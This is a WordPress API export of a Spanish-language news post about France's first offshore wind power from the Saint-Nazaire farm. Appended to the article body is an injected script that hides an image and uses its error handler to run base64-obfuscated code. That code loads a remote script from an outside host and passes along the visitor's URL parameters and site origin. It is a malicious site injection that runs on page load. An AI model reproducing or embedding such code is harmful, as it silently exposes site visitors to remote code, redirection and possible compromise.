{"id":5406,"date":"2022-06-17T20:43:04","date_gmt":"2022-06-17T23:43:04","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5406"},"modified":"2025-08-13T16:18:31","modified_gmt":"2025-08-13T19:18:31","slug":"francia-produce-energia-eolica-marina-por-primera-vez","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5406","title":{"rendered":"Francia produce energ\u00eda e\u00f3lica marina por primera vez"},"content":{"rendered":"\n<h6 class=\"has-text-align-right wp-block-heading\">Por&nbsp;<a href=\"https:\/\/plus.lefigaro.fr\/page\/uid\/60930\">Guillaume Guichard<\/a><\/h6>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg\" alt=\"\" class=\"wp-image-5399\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#01314d\"><strong>El anuncio fue hecho el viernes por el consorcio propietario del parque, que eventualmente incluir\u00e1 80 turbinas e\u00f3licas, y RTE.<\/strong><\/h4>\n\n\n\n<p>El parque e\u00f3lico marino frente a Saint-Nazaire, en construcci\u00f3n por EDF, suministr\u00f3 el viernes su primer megavatio hora a la red el\u00e9ctrica francesa. \u00ab<em>El parque e\u00f3lico marino de Saint-Nazaire, ha producido los primeros megavatios hora a partir de la energ\u00eda e\u00f3lica marina francesa<\/em>\u00ab, anunci\u00f3 el consorcio propietario del parque e\u00f3lico (por EDF Renewables, Enbridge y CPP) y RTE.<\/p>\n\n\n\n<p>Desde la instalaci\u00f3n del primer aerogenerador en abril, el parque cuenta ya con 27 instalados, algunos de los cuales ya est\u00e1n conectados a la red. As\u00ed que ya est\u00e1 empezando a producir. El campo marino eventualmente tendr\u00e1 80 turbinas e\u00f3licas que se instalar\u00e1n gradualmente a finales de a\u00f1o. El barco que transporta los elementos del aerogenerador tarda unas 24 horas en montarlos sobre sus cimientos. El parque, una vez terminado, tendr\u00e1 una capacidad total de 480 megavatios, \u00ab<em>equivalente al consumo dom\u00e9stico anual de 700.000 personas<\/em>\u00ab, se\u00f1ala EDF.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"dix-ans-d-attente\"><em><span style=\"color:#0693e3\" class=\"tadv-color\">Diez a\u00f1os de espera<\/span><\/em><\/h3>\n\n\n\n<p>Pasaron diez a\u00f1os entre el lanzamiento de la licitaci\u00f3n en 2012 y la producci\u00f3n de los primeros megavatios hora. Este retraso coloca a Francia en la parte inferior del paquete europeo en t\u00e9rminos de desarrollo e\u00f3lico marino en Europa. Emmanuel Macron prometi\u00f3 una \u00ab<em>ley de emergencia<\/em>\u00bb para acelerar los tr\u00e1mites y acortar la duraci\u00f3n de las consultas p\u00fablicas y las apelaciones.<\/p>\n\n\n\n<p><strong>VEA TAMBI\u00c9N<\/strong>&nbsp;&#8211; Emmanuel Macron promete multiplicar por diez la energ\u00eda solar y desplegar 50 parques e\u00f3licos marinos para 2050<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/video.lefigaro.fr\/figaro\/video\/emmanuel-macron-promet-de-multiplier-par-10-le-solaire-et-de-deployer-50-parcs-eoliens-en-mer-dici-2050\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"915\" height=\"509\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_203823_www.lefigaro.fr_.jpeg\" alt=\"\" class=\"wp-image-5407\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_203823_www.lefigaro.fr_.jpeg 915w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_203823_www.lefigaro.fr_-300x167.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_203823_www.lefigaro.fr_-768x427.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_203823_www.lefigaro.fr_-696x387.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_203823_www.lefigaro.fr_-755x420.jpeg 755w\" sizes=\"(max-width: 915px) 100vw, 915px\" \/><\/a><\/figure>\n\n\n\n<p>Hasta la fecha, 17 proyectos e\u00f3licos marinos est\u00e1n en desarrollo o construcci\u00f3n en Francia, lo que representa una capacidad de m\u00e1s de 10 gigavatios. \u00ab<em>Como record\u00f3 RTE en su informe \u00abEnergy Futures 2050\u00bb, lograr la neutralidad de carbono es imposible sin un desarrollo significativo de las energ\u00edas renovables, incluidas las energ\u00edas renovables marinas<\/em>\u00ab, recuerdan los gerentes del campo Saint-Nazaire.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.lefigaro.fr\/social\/la-france-produit-pour-la-premiere-fois-de-l-electricite-eolienne-en-mer-20220610\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_204019_www.lefigaro.fr_.jpeg\" alt=\"\" class=\"wp-image-5408\" width=\"200\" height=\"44\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_204019_www.lefigaro.fr_.jpeg 419w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_16-6-2022_204019_www.lefigaro.fr_-300x66.jpeg 300w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Por&nbsp;Guillaume Guichard El anuncio fue hecho el viernes por el consorcio propietario del parque, que eventualmente incluir\u00e1 80 turbinas e\u00f3licas, y RTE. El parque e\u00f3lico marino frente a Saint-Nazaire, en construcci\u00f3n por EDF, suministr\u00f3 el viernes su primer megavatio hora a la red el\u00e9ctrica francesa. \u00abEl parque e\u00f3lico marino de Saint-Nazaire, ha producido los primeros [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5409,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-5406","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5406","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5406"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5406\/revisions"}],"predecessor-version":[{"id":10654,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5406\/revisions\/10654"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5409"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5406"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5406"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5406"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}